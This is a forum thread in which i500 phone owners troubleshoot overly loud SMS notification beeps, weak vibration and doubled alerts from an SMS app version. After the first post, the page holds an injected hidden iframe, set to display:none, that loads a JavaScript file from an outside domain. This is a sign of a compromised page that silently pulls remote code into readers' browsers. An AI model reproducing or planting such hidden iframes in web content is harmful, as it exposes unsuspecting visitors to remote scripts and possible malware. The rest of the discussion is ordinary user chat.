+ Reply to Thread

Unhappy Message Notification Volume

I did a search of the boards and screwed around with my phone for over an hour trying to figure this out. Can someone please tell me how to turn down the volume for message notification? It seems to be at the loudest setting and the only time it is any quiter is when you turn the ringer to "silent". It's too loud for me and it's irritating my co-workers. I'm looking for a volume closer to the volume level of the beep i500 sms uses when it finishes fetching your shortmail.

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Also, is there a way to extend the vibrate? When I get a message it doesn't vibrate but more then once or so. Its sucha weak vibrate, i miss everything!

Hmm... you mean the overall ringer volume does not affect the mesage notification volume? I'll have to check that out.

Okay my notification volume is definitely affected when I change the ringer volume. The wierd thing for me is that I am still getting 2 'rings' when I get a message. I am using I500SMS v.031. I wonder if it has something to do with the midi ringer I am using

Originally posted by SkyFinGrp
    Okay my notification volume is definitely affected when I change the ringer volume. The wierd thing for me is that I am still getting 2 'rings' when I get a message. I am using I500SMS v.031. I wonder if it has something to do with the midi ringer I am using
    In the Phone Preferences>Sounds>Type menu I have selected 1-Beep as my ringer for Messages & regardless of the ringer Volume that 1-Beep is really loud.

As far as your problem, did you go into the same menu above and change the Messages setting to the ringer of your choice & it does a different ring?

Originally posted by 8notime
    In the Phone Preferences>Sounds>Type menu I have selected 1-Beep as my ringer for Messages & regardless of the ringer Volume that 1-Beep is really loud.

As far as your problem, did you go into the same menu above and change the Messages setting to the ringer of your choice & it does a different ring?
    1. I changed my mressage notification type to One Beep and I ge the same behavior... loud.

2. Yea, I changed to of the midi tones and sure enough I get two separate notifications when SMS comes in. I thought I500SMS v.031 was to correct this but it really isn't that big of a deal for me. Maybe the fix was for the One Beep only?

Originally posted by SkyFinGrp
    1. I changed my mressage notification type to One Beep and I ge the same behavior... loud.
    Well at least I'm not the only one. I wish there was a way to control the volume of it, but oh well.

2. Yea, I changed to of the midi tones and sure enough I get two separate notifications when SMS comes in. I thought I500SMS v.031 was to correct this but it really isn't that big of a deal for me. Maybe the fix was for the One Beep only?
    No it does it when set to One Beep to. Only the i500 SMS beep comes after the i500 one beep and it's quieter. Jeesh I'm not sure I even understand what I just wrote... lol

Originally posted by 8notime
    Well at least I'm not the only one. I wish there was a way to control the volume of it, but oh well.

No it does it when set to One Beep to. Only the i500 SMS beep comes after the i500 one beep and it's quieter. Jeesh I'm not sure I even understand what I just wrote... lol
    Yea... it's time for me to have a drink too

Cheers!

did anyone ever figure anything out regarding this? I swear at some point I somehow got into a "message volume" setting, but clicked out of it before I even knew I was in it....my beep is ridiculously loud and it never was that loud before, so there must be a way to change it...

8notime:

Are you back with the I500 after your "fling" with the Treo 600?